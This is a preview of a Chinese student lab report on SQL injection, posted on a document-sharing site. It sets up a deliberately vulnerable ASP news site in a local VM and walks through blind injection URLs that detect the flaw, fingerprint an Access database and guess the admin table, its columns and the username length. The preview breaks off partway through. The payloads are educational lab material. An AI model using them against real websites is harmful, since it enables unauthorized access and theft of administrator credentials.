返回
sql注入攻击实验报告材料

sql注入攻击实验报告材料

ID:30278060

大小:1.88 MB

页数:15页

时间:2018-12-28

sql注入攻击实验报告材料_第1页
sql注入攻击实验报告材料_第2页
sql注入攻击实验报告材料_第3页
sql注入攻击实验报告材料_第4页
sql注入攻击实验报告材料_第5页
资源描述:

《sql注入攻击实验报告材料》由会员上传分享,免费在线阅读,更多相关内容在工程资料-天天文库

1、实用标准文案实验报告(实验名称:SQL注入攻击)精彩文档实用标准文案一、实验目的通过SQL注入攻击,掌握网站的工作机制,认识到SQL注入攻击的防范措施,加强对Web攻击的防范。二、实验环境描述实验开展所基于的网络环境,给出网络拓扑、IP地址、web服务器、客户机等信息。宿主机(客户机):操作系统为Windows10,IP为192.168.18.11,在主机上安装虚拟化软件VmwarePlayer,在此基础上创建虚拟机并安装操作系统,进行网络配置,采用环回适配器,桥接模式,实现宿主机与虚拟机之间的网络通信,虚拟机(Web服务器):操作系统为WindowsXP,IP为192.168.18.9,

2、本实验利用windows的iis服务搭建了一个有SQL注入漏洞的网站“ASP新闻发布系统”,以该网站为目标,对其实施SQL注入攻击。本实验所需工具如下:IIS是InternetInformationServer的缩写,是微软提供的Internet服务器软件,包括Web、FTP、Mail等服务器,也是目前常用的服务器软件。版本不限。“啊D”注入工具:对“MSSQL显错模式”、“MSSQL不显错模式”、“Access”等数据库都有很好的注入检测能力,内集“跨库查询”、“注入点扫描”、“管理入口检测”、“目录查看”等等于一身的注入工具包。“ASP新闻发布系统”Ok3wv4.6源码。三、实验内容(

3、一)配置实验环境,首先选择网络适配器,安装环回适配器,在主机上安装VmwarePlayer,成功启动虚拟机。接着配置宿主机和虚拟机的IP,如图要注意的是,配置主机上的IP时,应该选择VMnet8,并且注意勾取Bridge精彩文档实用标准文案然后,验证宿主机和虚拟机是否联通,结果显示连接成功。最后在虚拟机上安装IIS程序,精彩文档实用标准文案打开浏览器,输入地址“127.0.0.1”,检查网站搭建情况。成功!(二)寻找注入点在宿主机上,打开网页http://192.168.18.9/list.asp?id=95,可以正常打开页面。进行注入测试,键入http://192.168.18.9/li

4、st.asp?id=95and1=1,返回页面不变。精彩文档实用标准文案键入http://192.168.18.9/list.asp?id=95and1=2,返回页面出错。因此,可确定该网站存在注入点。(三)判断数据库类型用系统表的方法进行判断,分别键入http://192.168.18.9/list.asp?id=95and(selectcount(*)fromsysobjects)>0http://192.168.18.9/list.asp?id=95and(selectcount(*)frommsysobjects)>0精彩文档实用标准文案两者返回均出错,可知是access数据库。

5、精彩文档实用标准文案(四)猜测表名一般网站后台的管理员都默认在表admin中,我们先试一下,键入:http://192.168.18.9/list.asp?id=95and(selectcount(*)fromadmin)<>0返回页面正常,可知该网站后台数据库中存在着表名为admin的表。 (五)猜测字段名不同公司网站有不同的字段名,但一般都有三个字段,分别记录ID号、用户名和密码,常用的字段名为:id,username,password。分别键入http://192.168.18.9/list.asp?id=95and(selectcount(id)fromadmin)<>0http:

6、//192.168.18.9/list.asp?id=95and(selectcount(username)fromadmin)<>0http://192.168.18.9/list.asp?id=95and(selectcount(password)fromadmin)<>0三者返回均正常。可知,表admin中存在的三个字段:id,username,password。注:“username”的截图损坏,但是返回正常,望教员通融。(六)猜测管理员用户名和密码1.确定表admin中有几条记录,键入http://192.168.18.9/list.asp?id=95and(selectcoun

7、t(*)fromadmin)=1返回页面正常。精彩文档实用标准文案可知,表admin只有一条记录。2.猜测用户名长度,键入http://192.168.18.9/list.asp?id=95and(selectlen(username)fromadmin)=1返回出错,继续键入http://192.168.18.9/list.asp?id=95and(selectlen(username)fromadmin)=2返回出错

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。